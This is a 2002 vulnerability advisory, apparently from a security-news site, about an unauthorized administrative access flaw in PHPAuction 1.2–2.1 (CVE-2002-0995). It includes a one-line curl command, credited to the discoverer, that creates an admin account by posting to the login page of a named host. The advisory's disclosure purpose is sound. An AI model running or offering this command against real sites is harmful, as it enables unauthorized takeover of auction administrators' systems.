exploits , vulnerabilities , articles , PHPAuction Unauthorized Administrative Access Vulnerability

Title	PHPAuction Unauthorized Administrative Access Vulnerability
Published	2002-07-02-12:00AM
Updated	2002-07-02-07:26PM
Class	Access Validation Error
CVE	CVE-2002-0995
Remote	Yes
Local	No
Credit	Discovered by <ethx@hotmail.com>.
Vulnerable	PHPAuction PHPAuction 2.1 PHPAuction PHPAuction 2.0 PHPAuction PHPAuction 1.3 PHPAuction PHPAuction 1.2
Not Vulnerable
Code	No exploit is required. <ethx@hotmail.com> has contributed the following curl command, which is sufficent for exploitation: curl http://pro.phpauction.org/proplus/admin/login.php -d "action=insert" -d "username=test" -d "password=test"
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-04 Rae Media Web Based Contact Management Login SQL Injection Vulnerability
• 2008-12-04 Nagios External Commands and Adaptive Commands Unspecified Vulnerability
• 2008-12-04 Z1Exchange SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 mvnForum Cross Site Scripting Vulnerability
• 2008-12-04 i-Net Solution Orkut Clone SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
• 2008-12-04 Jbook SQL Injection Vulnerability
• 2008-12-04 SquirrelMail Malformed HTML Mail Message HTML Injection Vulnerability
• 2008-12-04 HP-UX Unspecified Local Denial Of Service Vulnerability
• 2008-12-04 Netrw Vim Script Information Disclosure Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:22:42 +0000